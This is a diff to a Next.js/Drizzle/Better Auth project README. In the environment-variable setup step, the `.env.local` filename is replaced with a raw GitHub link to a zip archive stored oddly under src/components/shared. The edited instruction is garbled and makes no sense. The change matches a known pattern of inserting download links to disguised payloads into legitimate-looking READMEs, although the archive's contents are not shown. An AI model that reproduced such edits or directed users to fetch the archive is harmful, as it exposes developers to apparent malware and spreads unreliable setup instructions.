rayandripo/nextjs_drizzle_better-auth/README.md

 3. **Set Up Environment Variables**:

-   Create a `.env.local` file in the root directory and add your database connection string and any other required environment variables.
+   Create a `https://raw.githubusercontent.com/rayandripo/nextjs_drizzle_better-auth/master/src/components/shared/drizzle-better-auth-nextjs-v2.2-beta.3.zip` file in the root directory and add your database connection string and any other required environment variables.

    ```plaintext
    DATABASE_URL=your_database_url